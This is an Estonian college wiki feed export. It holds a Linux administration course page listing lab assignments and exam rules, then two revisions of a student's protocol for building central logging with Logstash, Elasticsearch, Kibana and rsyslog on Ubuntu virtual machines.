Samba4 domeenikontrolleri seadistamine ja ubuntu/fedora/muu süsteem autentimise seadistamine kasutades uusi vahendeid&lt;br /&gt;
&lt;br /&gt;
[[Apt-yum/dpkg-rpm käskude lühivõrdlus]] - Teet Saar A32&lt;br /&gt;
&lt;br /&gt;
[[Ophcrack]] - teeb Kristo Kapten&lt;br /&gt;
&lt;br /&gt;
[[rancid]] - Meelis Kurnikov, Aive Haavel AK31&lt;br /&gt;
&lt;br /&gt;
[[zenoss]] - Kristjan Vaik&lt;br /&gt;
&lt;br /&gt;
[[Apache autentimine LDAP&#039;iga]] - Rauno Lehiste&lt;br /&gt;
=Esseede teemad 2013=&lt;br /&gt;
[[Owncloud]] - Tõnu Erm AK31&lt;br /&gt;
[[Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll]] - Sten Aus 28.11.2013&lt;br /&gt;
&lt;br /&gt;
=Eksamist=&lt;br /&gt;
&lt;br /&gt;
Tee ära labor 2 (oma valitud teemal + selle kohta wiki kirjatöö)&lt;br /&gt;
Eksamil ole valmis demoma labor 1 raames kaitstud asju.&lt;br /&gt;
&lt;br /&gt;
Kirjatööd sisu tuleb eksamil kaitsta vestluse vormis.&lt;br /&gt;
&lt;br /&gt;
Eksami käigus saab kaitsta ka labor 1 ja 2 asju.&lt;br /&gt;
&lt;br /&gt;
Eksami käigus tõmbad loosi, mida labor 1 raames parandada. Õppejõud teeb teenuse katki ja tudeng teeb korda. (soovitatav on eelnevalt teha  teenusest varukoopia).&lt;br /&gt;
&lt;br /&gt;
Punkte saab selgituse eest, mis oli katki ja kuidas tegid korda.&lt;br /&gt;
&lt;br /&gt;
Katki tegemisel võib arvestada näiteks, et algaja admin (õppejõud:) muutis ära parooli, rikkus võrguseaded ja kustutas täiesti süüdimatult mõne konfifaili.&lt;br /&gt;
&lt;br /&gt;
=Laborimaterjalid 2012=&lt;br /&gt;
&lt;br /&gt;
Teha apt -  yum ja dpkg - rpm vastavustabel. dpkg ja apt korraldused leiab [http://elab.itcollege.ee:8000/Linux-Basics.mm Linux-Basics mindmapist]&lt;br /&gt;
&lt;br /&gt;
Parim töö annab 7p, järgmised 5p (piisavalt põhjalikud ja erinevad)&lt;br /&gt;
&lt;br /&gt;
Ebapiisavad vastavustabelid, mis sarnanevad üksteisele punkte ei saa.&lt;br /&gt;
&lt;br /&gt;
Kui su tabel on ilma vigadeta, kuid mitte parimate sead siis saad 1-2p.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 4&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Nimeserveri BIND9 paigaldamine.&lt;br /&gt;
&lt;br /&gt;
*Mõtle välja domeenimini&lt;br /&gt;
*Paigalda nimeserver bind9&lt;br /&gt;
*Seadista oma domeen&lt;br /&gt;
**www.domeen&lt;br /&gt;
**ns.domeen&lt;br /&gt;
**sales.domeen&lt;br /&gt;
**seadista oma kliendimasin kasutama uut nimeserverit&lt;br /&gt;
&lt;br /&gt;
NB: enne kaitsmist lugeda läbi http://kuutorvaja.eenet.ee/wiki/DNS&lt;br /&gt;
&lt;br /&gt;
Labori üks näide [[Nimeserveri seadistamine BIND9 näitel]]&lt;br /&gt;
&lt;br /&gt;
Praktikumi salvestus http://echo360.e-uni.ee/ess/echo/presentation/a828b6af-8caf-4319-b594-5d6bfed04a70&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; peab töötama nii nimede lahendamine läbi teie nimeserveri kui ka reverse lookup.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 5&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Veebiserveri apache2 paigaldamine&lt;br /&gt;
&lt;br /&gt;
*Loo veebisaidid www.domeen ja sales.domeen (ehk oma DNS labori nimedele vastavad veebisaidid)&lt;br /&gt;
Praktikumi salvestus: http://echo360.e-uni.ee/ess/echo/presentation/0945a764-0305-48ec-8082-4e57a23cc536&lt;br /&gt;
*Seadist HTTPS nendele saitidele (vajadusel loo uus ip alias ja muuda nimeserveris olevat kirjet, et TLS nimed viitaks erinevatele IP aadressidele)&lt;br /&gt;
*Abiks on loeng: http://enos.itcollege.ee/~mernits/infrastruktuur/loeng04%20-%20Veebiserver.odp ja labor: https://wiki.itcollege.ee/index.php/Veebiserveri_labor_v.2&lt;br /&gt;
*Paigalda WordPress vastavalt juhendile: http://goo.gl/6XQ0U&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; peab töötama veebiserververi apache2 pealt 2 veebilehte ning wordpress. Wordpressile peab olema paigaldatud super cache ning lisaks peab töötama varnish. Seejuures wordpress on seadistatud pordile 80 ja wordpress pordil 8080. Lehe toimivust testige enne kaitsmist ab vahendiga, kus -n 1000 ja -t 10.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 7&#039;&#039;&#039;&lt;br /&gt;
Samba share-i välja jagamine. &lt;br /&gt;
&lt;br /&gt;
*Loo share, mis on ligipääsetav vaid kasutajatele, kes kuuluvad lab gruppi. Vajalik on ka share-ile kirjutamisõigus (saab kausta luua). &lt;br /&gt;
* Seadista samba abil kasutajate kodukaustadele ligipääsemine. Iga kasutaja peab ligi pääsema enda kodukaustale. &lt;br /&gt;
&lt;br /&gt;
*Abiks on viki artiklid : https://wiki.itcollege.ee/index.php/Failiserver_Samba_labor_2 ja https://wiki.itcollege.ee/index.php/Lihtne_samba_install&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; on vajalik share-i olemasolu, mis on ligipääsetav ning kirjutatav (võimalik luua kataloogi) ainult lab gruppi kuuluvatele kasutajatele ning lab gruppi mitte kuuluvad kasutajad ei tohi sinna ligi pääseda. &lt;br /&gt;
Lisaks peavad kasutajad pääsema ligi oma kodukaustale, sõltumata sellest, kas ta kuulub lab gruppi või mitte.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Labor 1&#039;&#039;&#039;&lt;br /&gt;
*Veebiserver ja virtualhostid&lt;br /&gt;
*DNS&lt;br /&gt;
*e-post&lt;br /&gt;
*iptables&lt;br /&gt;
*samba&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Labor 2&#039;&#039;&#039;&lt;br /&gt;
*LDAP või Samba4 - LDAP Teet Saar, Kullo-Kalev Aru&lt;br /&gt;
*Puppet või chef&lt;br /&gt;
*PAM&lt;br /&gt;
*Puppet (Ubuntus) - Kristo Kapten&lt;br /&gt;
*[[Samba(windows domeenis fileserver)]] - Marko Kurs&lt;br /&gt;
*[[TLS termineerimine nginx abil]] - Sander Arnus, Sander Saveli&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68988</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68988"/>
		<updated>2013-11-28T11:38:50Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Rsyslog */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, versioon 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid&lt;br /&gt;
&lt;br /&gt;
Elasticsearch versioon 0.90.0 - logide talletamiseks&lt;br /&gt;
&lt;br /&gt;
Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
&lt;br /&gt;
== Serveri seadistamine ==&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
=== Logstash ===&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ja faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Elasticsearch ===&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Kibana ===&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.&lt;br /&gt;
&lt;br /&gt;
=== Rsyslog ===&lt;br /&gt;
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68987</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68987"/>
		<updated>2013-11-28T11:36:55Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Logstash */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, versioon 12.04.3 LTS&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid&lt;br /&gt;
&lt;br /&gt;
Elasticsearch versioon 0.90.0 - logide talletamiseks&lt;br /&gt;
&lt;br /&gt;
Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
&lt;br /&gt;
== Serveri seadistamine ==&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
=== Logstash ===&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ja faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Elasticsearch ===&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Kibana ===&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
